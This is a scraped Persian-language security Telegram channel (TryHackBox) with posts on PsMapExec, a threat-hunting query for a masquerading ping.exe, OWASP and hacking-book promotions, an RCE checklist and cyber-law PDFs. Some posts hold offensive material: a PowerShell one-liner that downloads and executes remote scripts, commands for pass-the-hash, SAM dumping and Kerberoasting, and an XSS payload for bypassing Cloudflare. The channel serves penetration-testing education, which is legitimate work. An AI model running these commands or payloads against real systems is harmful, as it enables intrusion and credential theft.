Try Hack Box
🔖 PsMapExec v0.9.0 یک به روزرسانی برای ابزار post-exploitation در Active Directory که با PowerShell نوشته شده منتشر شد. به روز رسانی پشتیبانی از چند دامنه بهبود عملکرد از طریق Proxifier / تونلهای SSH امکان روشن/خاموش کردن RDP ماژولهای جدید: EventCreds…
اجرای ابزار از حافظه:
مثالها:
اجرای با کاربر جاری
با پسورد
با هش
با تیکت
دامپ فایل SAM
Kerberoasting
استفاده از ماژول ها
@TryHackBox
#pentest #powershell #psmapexec
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")مثالها:
اجرای با کاربر جاری
PsMapExec -Targets All -Method [Method]
با پسورد
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]
با هش
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]
با تیکت
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]
دامپ فایل SAM
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM
Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput
استفاده از ماژول ها
PsMapExec -Targets All -Method [Method] -Module [Module]
@TryHackBox
#pentest #powershell #psmapexec
❤7
قوانین سایبری بینالمللی.pdf
601.2 KB
⚖ آشنایی با قوانین سایبری در سطح بین و المللی
⭕ بدون شناخت قوانین جهانی امنیت سایبری، هر فعالیت فنی میتونه دردسرساز بشه!
⭕ این فایل شامل خلاصهای از مهمترین قوانین سایبری در اروپا، آمریکا و سایر کشورهاست.
💢 قوانین سایبری فقط مخصوص ایران نیست .
💢 این فایل یه نگاه جهانی داره به قانونهایی که درباره هک، داده، و امنیت سایبری تصویب شدن.
⭕ حتما بخون قبل از هر تست یا پروژه فنی
@TryHackBox
#قوانین_سایبری_بینالمللی #قوانین_سایبری
⭕ بدون شناخت قوانین جهانی امنیت سایبری، هر فعالیت فنی میتونه دردسرساز بشه!
⭕ این فایل شامل خلاصهای از مهمترین قوانین سایبری در اروپا، آمریکا و سایر کشورهاست.
💢 قوانین سایبری فقط مخصوص ایران نیست .
💢 این فایل یه نگاه جهانی داره به قانونهایی که درباره هک، داده، و امنیت سایبری تصویب شدن.
⭕ حتما بخون قبل از هر تست یا پروژه فنی
@TryHackBox
#قوانین_سایبری_بینالمللی #قوانین_سایبری
❤5👍1
Securelist
Mysterious Elephant APT: TTPs and tools
Kaspersky GReAT experts describe the latest Mysterious Elephant APT activity. The threat actor exfiltrates data related to WhatsApp and employs tools such as BabShell and MemLoader HidenDesk.
امروز برای اولین بار سراغ یک تکنیک کاربردی می ریم که برای شکار تهدید خیلی مفیده
Masquerading: Match Legitimate Resource Name or Location (T1036.005).
مثل همیشه، با یک مثال شروع میکنیم
https://securelist.com/mysterious-elephant-apt-ttps-and-tools/117596/
همانطور که مشاهده میشود، مهاجمان فایلهای مخرب را شبیه ابزارِ معتبر ping جلوه دادهاند. چنین مواردی را میتوان مستند سازی کرد و هم برای تشخیص و هم برای شکار تهدید از آن ها استفاده کرد برای مثال:
@TryHackBox
Masquerading: Match Legitimate Resource Name or Location (T1036.005).
مثل همیشه، با یک مثال شروع میکنیم
https://securelist.com/mysterious-elephant-apt-ttps-and-tools/117596/
C:\ProgramData\Intel\ping.exe
C:\Users\Public\ping.exe
همانطور که مشاهده میشود، مهاجمان فایلهای مخرب را شبیه ابزارِ معتبر ping جلوه دادهاند. چنین مواردی را میتوان مستند سازی کرد و هم برای تشخیص و هم برای شکار تهدید از آن ها استفاده کرد برای مثال:
event_type: "processcreatewin"
AND
proc_file_path: "ping.exe"
AND NOT
proc_file_path: ("windows\system32" OR "windows\syswow64")
@TryHackBox
#سوال
دوستان فکر کنید در یک مصاحبه هستید و ازتون سوال میپرسند :
بزرگترین نقطه قوت شما چیست؟
دوستان فکر کنید در یک مصاحبه هستید و ازتون سوال میپرسند :
بزرگترین نقطه قوت شما چیست؟
جواب هاتون کامنت کنید
❤6👏2
Try Hack Box
#سوال دوستان فکر کنید در یک مصاحبه هستید و ازتون سوال میپرسند : بزرگترین نقطه قوت شما چیست؟ جواب هاتون کامنت کنید
دوستان بات عضویت اجباری برداشته شد راحت میتونید بحث کنید.
نگاهی به پست های قبل :
راهنمای جامع تزریق پروسس در لینوکس
آزمایش آسیبپذیری آپاچی
چک لیست برای تست نفوذ اندروید
Credential Dumping DCSync Attack
جلسه هفتم دوره رایگان سکوریتی پلاس
واژهنامه امنیت سایبری TryHackBox
Browser Extensions For Bug Bounty
NTLM Relay Attack ?
Secure and insecure ports
PASSWORD CRACKING TOOLS
تزریق پرامپت Exploiting از سردرگمی دستورات LLM
ماه آگاهیبخشی امنیت سایبری
بیایید بیشتر در مورد APT و ..
SDDL | اشکهاتو برای یه روز دیگه نگه دار
بازیابی رمزهای عبور از ترافیک Kerberos کپچر شده
در برخی موارد، مهاجمان ...
دیکشنری های پسورد
تست فایلهای JavaScript در حوزه باگ بانتی
ریورس و تحلیل امنیتی سیستم خانه هوشمند مبتنی بر ESP32
بازی رمز عبور
فایروال دیوار دفاعی شبکه
مقدمات فایروال
بررسی reconnaissance بر پایه LinkedIn
آشنایی با قوانین جرایم سایبری در ایران
آشنایی با قوانین سایبری در سطح بین و المللی
راهنمای جامع تزریق پروسس در لینوکس
آزمایش آسیبپذیری آپاچی
چک لیست برای تست نفوذ اندروید
Credential Dumping DCSync Attack
جلسه هفتم دوره رایگان سکوریتی پلاس
واژهنامه امنیت سایبری TryHackBox
Browser Extensions For Bug Bounty
NTLM Relay Attack ?
Secure and insecure ports
PASSWORD CRACKING TOOLS
تزریق پرامپت Exploiting از سردرگمی دستورات LLM
ماه آگاهیبخشی امنیت سایبری
بیایید بیشتر در مورد APT و ..
SDDL | اشکهاتو برای یه روز دیگه نگه دار
بازیابی رمزهای عبور از ترافیک Kerberos کپچر شده
در برخی موارد، مهاجمان ...
دیکشنری های پسورد
تست فایلهای JavaScript در حوزه باگ بانتی
ریورس و تحلیل امنیتی سیستم خانه هوشمند مبتنی بر ESP32
بازی رمز عبور
فایروال دیوار دفاعی شبکه
مقدمات فایروال
بررسی reconnaissance بر پایه LinkedIn
آشنایی با قوانین جرایم سایبری در ایران
آشنایی با قوانین سایبری در سطح بین و المللی
🔖 شاخص منابع شناخته شده
ابزاری آنلاین برای اسکن یک وبسایت و پیدا کردن اطلاعات درباره آن:
و دیگر موارد.
https://well-known.dev/
@TryHackBox
ابزاری آنلاین برای اسکن یک وبسایت و پیدا کردن اطلاعات درباره آن:
- robots.txt file
- security.txt
- ads.txt
- assetlinks.json
- app-ads.txt
- gpc.json
و دیگر موارد.
https://well-known.dev/
@TryHackBox
❤7
🛡 راهنمای نهایی تست امنیت وب (WSTG)
📚 معرفی یک مرجع بینظیر برای متخصصان امنیت:
Web Security Testing Guide (WSTG)
جامعترین راهنمای تست امنیت برنامههای تحت وب
✨ مشخصات کتاب:
- ناشر: OWASP Foundation 🏢
- سازمان منتشرکننده: Open Web Application Security Project
- نوع محتوا: راهنمای رایگان و متنباز
- بهروزرسانی: نسخه اخیر (v4.2)
🎯 چه چیزی داخلش پیدا میکنید:
✅ تست احراز هویت و مدیریت نشست
✅ تست کنترل دسترسی
✅ تست تزریق (SQLi, XSS, Command Injection)
✅ تست منطق کسبوکار
✅ تست امنیت API
✅ و دهها فصل تخصصی دیگر...
🚀 چرا WSTG رو دانلود کنم؟
- منبع رسمی OWASP معتبرترین مرجع جهانی
- پوشش کامل چرخه تست امنیتی
✍️نویسنده
@TryHackBox | The Chaos
#WSTG #WebSecurity #OWASP #SecurityTesting
#CyberSecurity
📚 معرفی یک مرجع بینظیر برای متخصصان امنیت:
Web Security Testing Guide (WSTG)
جامعترین راهنمای تست امنیت برنامههای تحت وب
✨ مشخصات کتاب:
- ناشر: OWASP Foundation 🏢
- سازمان منتشرکننده: Open Web Application Security Project
- نوع محتوا: راهنمای رایگان و متنباز
- بهروزرسانی: نسخه اخیر (v4.2)
🎯 چه چیزی داخلش پیدا میکنید:
✅ تست احراز هویت و مدیریت نشست
✅ تست کنترل دسترسی
✅ تست تزریق (SQLi, XSS, Command Injection)
✅ تست منطق کسبوکار
✅ تست امنیت API
✅ و دهها فصل تخصصی دیگر...
🚀 چرا WSTG رو دانلود کنم؟
- منبع رسمی OWASP معتبرترین مرجع جهانی
- پوشش کامل چرخه تست امنیتی
✍️نویسنده
@TryHackBox | The Chaos
#WSTG #WebSecurity #OWASP #SecurityTesting
#CyberSecurity
❤6👍3🤔2
hidden links.pdf
6.8 MB
🔖 لینک های پنهان: تحلیل خانواده های مخفی اپلیکیشن های VPN .
💠 در این مقاله، ما حریم خصوصی و امنیت اپلیکیشنهای VPN را که ارائه دهندگان آنها به عمد مالکیت خود را پنهان میکنند، تحلیل میکنیم. ما از روابط پنهان بین ارائه دهندگان VPN که به ظاهر متمایز هستند، به عنوان یک نشانگر غیرمستقیم از رفتار فریبنده استفاده میکنیم. سپس به دنبال مسائل امنیتی خاص VPN در اپلیکیشن های ارائه دهندگان فریبنده هستیم تا نقص های مشترک را کشف کنیم.
@TryHackBox | Github | YouTube | Group
💠 در این مقاله، ما حریم خصوصی و امنیت اپلیکیشنهای VPN را که ارائه دهندگان آنها به عمد مالکیت خود را پنهان میکنند، تحلیل میکنیم. ما از روابط پنهان بین ارائه دهندگان VPN که به ظاهر متمایز هستند، به عنوان یک نشانگر غیرمستقیم از رفتار فریبنده استفاده میکنیم. سپس به دنبال مسائل امنیتی خاص VPN در اپلیکیشن های ارائه دهندگان فریبنده هستیم تا نقص های مشترک را کشف کنیم.
@TryHackBox | Github | YouTube | Group
👍10
🚀 پروژه جدیدمون رو معرفی میکنم
پروژه و ریپازیتوری ای رو آماده سازی کردیم که کم کم رشد اش بدیم و بتونیم لابراتوار های خانگی با کیفیتی رو با سناریو های آموزشی یا سناریو های واقعی برای حملات xss تداعی کنیم !
به اشتراک گذاشتن تجربه شما در مورد کد ها و ساختار و روند این لابراتوار ها به ما کمک میکنه که بهتر بشیم !
از اجر های کوچیک شروع میکنیم و باهاش یه اسمان خراش میسازیم !🏙🏙
🔗Github
✍️نویسنده
@TryHackBox | The Chaos
پروژه و ریپازیتوری ای رو آماده سازی کردیم که کم کم رشد اش بدیم و بتونیم لابراتوار های خانگی با کیفیتی رو با سناریو های آموزشی یا سناریو های واقعی برای حملات xss تداعی کنیم !
به اشتراک گذاشتن تجربه شما در مورد کد ها و ساختار و روند این لابراتوار ها به ما کمک میکنه که بهتر بشیم !
از اجر های کوچیک شروع میکنیم و باهاش یه اسمان خراش میسازیم !🏙🏙
🔗Github
✍️نویسنده
@TryHackBox | The Chaos
👍9🔥3❤2
🔥 کتاب JavaScript For Hackers
🧠 کتابی که دیدتون رو نسبت به جاوااسکریپت کاملا تغییر میده:
"JavaScript For Hackers"
این کتاب به شما یاد میده چطور از JS برای تست نفوذ و امنیت استفاده کنی
📖 مشخصات فنی:
- نویسنده: Gareth Heyes (از متخصصان برجسته امنیت)
- محتوای کتاب: تکنیکهای پیشرفته JS برای تست نفوذ
- سطح: متوسط تا پیشرفته
- تمرکز: امنیت سایبری و تست نفوذ
🎯 چیزی که این کتاب متفاوت میکنه:
✅ آموزش تفکر هکری با جاوااسکریپت
✅ تکنیکهای پیشرفته XSS و حملات کلاینتساید
✅ روشهای عبور از WAF و فیلترهای امنیتی
✅ ابزارسازی با JS برای تست نفوذ
✅ آنالیز امنیتی کدهای جاوااسکریپت
🚀 این کتاب برای کیه؟
- باگ هانترها و محققان امنیتی
- توسعهدهندگان Full-Stack
- متخصصان تست نفوذ وب
- دانشجویان امنیت سایبری
✍️نویسنده
@TryHackBox | The Chaos
#JavaScript #WebSecurity #Hacking #CyberSecurity #BugBounty
#XSS #WebAppSecurity
🧠 کتابی که دیدتون رو نسبت به جاوااسکریپت کاملا تغییر میده:
"JavaScript For Hackers"
این کتاب به شما یاد میده چطور از JS برای تست نفوذ و امنیت استفاده کنی
📖 مشخصات فنی:
- نویسنده: Gareth Heyes (از متخصصان برجسته امنیت)
- محتوای کتاب: تکنیکهای پیشرفته JS برای تست نفوذ
- سطح: متوسط تا پیشرفته
- تمرکز: امنیت سایبری و تست نفوذ
🎯 چیزی که این کتاب متفاوت میکنه:
✅ آموزش تفکر هکری با جاوااسکریپت
✅ تکنیکهای پیشرفته XSS و حملات کلاینتساید
✅ روشهای عبور از WAF و فیلترهای امنیتی
✅ ابزارسازی با JS برای تست نفوذ
✅ آنالیز امنیتی کدهای جاوااسکریپت
🚀 این کتاب برای کیه؟
- باگ هانترها و محققان امنیتی
- توسعهدهندگان Full-Stack
- متخصصان تست نفوذ وب
- دانشجویان امنیت سایبری
✍️نویسنده
@TryHackBox | The Chaos
#JavaScript #WebSecurity #Hacking #CyberSecurity #BugBounty
#XSS #WebAppSecurity
👏8❤1
Forwarded from
📖 وایرشارک برای ردتیمرها: از پایه تا پیشرفته
📚 عنوان کتاب: وایرشارک برای ردتیمرها (Wireshark for Red Teamers)
این کتاب یک راهنمای جامع و عملی برای یادگیری ابزار قدرتمند Wireshark است، با تمرکز ویژه روی کاربردهای آن در حوزه Red Teaming (تیم قرمز) و امنیت سایبری تهاجمی. کتاب از پایه شروع می کند و به مفاهیم پیشرفته مانند تحلیل ترافیک شبکه، شناسایی آسیبپذیریها، و تکنیکهای نفوذ می پردازد. محتوای اصلی کتاب شامل فصلهایی مانند معرفی Wireshark، درک ترافیک شبکه، تکنیکهای کپچرینگ پکتها، فیلترینگ، و کاربردهای عملی در Reconnaissance (شناسایی) و Command and Control (C2) است.
این کتاب مناسب چه کسانی است؟
ویژگی های کتاب ؟
چرا باید این کتاب را بخرید؟
دانلود فایل های تمرین و سناریوها
نمونه کتاب
توضیحات کامل را بخوانید .
💰 قیمت : ۲۵۰,۰۰۰ تومان
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
📚 عنوان کتاب: وایرشارک برای ردتیمرها (Wireshark for Red Teamers)
این کتاب یک راهنمای جامع و عملی برای یادگیری ابزار قدرتمند Wireshark است، با تمرکز ویژه روی کاربردهای آن در حوزه Red Teaming (تیم قرمز) و امنیت سایبری تهاجمی. کتاب از پایه شروع می کند و به مفاهیم پیشرفته مانند تحلیل ترافیک شبکه، شناسایی آسیبپذیریها، و تکنیکهای نفوذ می پردازد. محتوای اصلی کتاب شامل فصلهایی مانند معرفی Wireshark، درک ترافیک شبکه، تکنیکهای کپچرینگ پکتها، فیلترینگ، و کاربردهای عملی در Reconnaissance (شناسایی) و Command and Control (C2) است.
این کتاب مناسب چه کسانی است؟
ویژگی های کتاب ؟
چرا باید این کتاب را بخرید؟
دانلود فایل های تمرین و سناریوها
نمونه کتاب
توضیحات کامل را بخوانید .
💰 قیمت : ۲۵۰,۰۰۰ تومان
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
❤4👍2
RCE Vulnerability Check List by THB Team.pdf
690.2 KB
🔖 چک لیست آسیبپذیری RCE
⭕ تیم TryHackBox یک چک لیست جامع و کاربردی برای شناسایی و بهره برداری از آسیبپذیریهای RCE آماده کرده. این چک لیست شامل روشهای مختلف مثل Dependency Confusion، File Upload، SQL Injection، LFI، SSRF، XXE، Command Injection، Insecure Deserialization و SSTI هست و با لینکهای مفید برای مطالعه بیشتر همراهه.
@TryHackBox | Github | YouTube | Group
#RCE #Vulnerability
⭕ تیم TryHackBox یک چک لیست جامع و کاربردی برای شناسایی و بهره برداری از آسیبپذیریهای RCE آماده کرده. این چک لیست شامل روشهای مختلف مثل Dependency Confusion، File Upload، SQL Injection، LFI، SSRF، XXE، Command Injection، Insecure Deserialization و SSTI هست و با لینکهای مفید برای مطالعه بیشتر همراهه.
مطالعه کنید و نظراتتون رو برامون بنویسید
@TryHackBox | Github | YouTube | Group
#RCE #Vulnerability
❤8
XSS Bypass Cloudflare Payload:
لینکدین خودش را از کار انداخت…
@TryHackBox
#XSS #Bypass #payload
"><img/src=x/onerro=6><img/src="1"/onerror=alert(1);>
لینکدین خودش را از کار انداخت…
@TryHackBox
#XSS #Bypass #payload
1❤10🎃3👍1